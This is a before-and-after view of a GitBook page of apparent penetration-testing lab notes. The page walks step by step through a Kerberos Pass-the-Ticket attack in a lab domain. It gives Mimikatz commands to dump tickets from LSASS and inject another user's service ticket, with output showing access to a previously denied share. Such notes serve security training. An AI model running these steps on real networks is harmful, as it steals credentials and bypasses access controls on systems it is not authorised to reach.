active-directory/lateral-movement-techniques/pass-the-ticket.md, before:

# Pass The Ticket



## Recap

Kerberos uses a Ticket Granting Service (TGS) authentication method. The _Pass the Ticket_ attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service.&#x20;



##

## Attack



To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject _dave_'s WEB04 TGS into our own session. This will allow us to access the restricted folder.

### Verify Jen does not have Access

We can verify that Jen does not have access to the following folder:

```powershell
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
```



### Launch Mimikatz

This command parses the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

```powershell
mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...
```



### Verify Generated Tickets

We can verify the newly generated tickes by filters out files with the \*.kirbi extension

```powershell
PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...
```



### Selecting TGS Ticket

Many tickets have been created, we can select any and inject it through mimikatz

```powershell
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK
```



### Verifying Ticket Injection in Session

Let's verify that we've injected the ticket by entering "klist"

```powershell
PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
```



### Confirming Success

Let's confirm that we've successfully completed the attack by trying to access the folder we initially didn't have permissions for:

```powershell
PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt
```

Commit message:

GITBOOK-157: change request with no subject merged in GitBook

active-directory/lateral-movement-techniques/pass-the-ticket.md, after:

# Pass The Ticket



## Recap

Kerberos uses a Ticket Granting Service (TGS) authentication method. The _Pass the Ticket_ attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service.&#x20;



In this scenario we abuse the already existing session ticket of the user "dave" that exists on the network. We will fetch the ticket with mimikatz and inject the ticket into our current user: "Jen" to access files that are under daves permission.

## Attack



To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject _dave_'s WEB04 TGS into our own session. This will allow us to access the restricted folder.

### Verify Jen does not have Access

We can verify that Jen does not have access to the following folder:

```powershell
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
```



### Launch Mimikatz

This command parses the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

```powershell
mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...
```



### Verify Generated Tickets

We can verify the newly generated tickes by filters out files with the \*.kirbi extension

```powershell
PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...
```



### Selecting TGS Ticket

Many tickets have been created, we can select any and inject it through mimikatz

```powershell
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK
```



### Verifying Ticket Injection in Session

Let's verify that we've injected the ticket by entering "klist"

```powershell
PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
```



### Confirming Success

Let's confirm that we've successfully completed the attack by trying to access the folder we initially didn't have permissions for:

```powershell
PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt
```
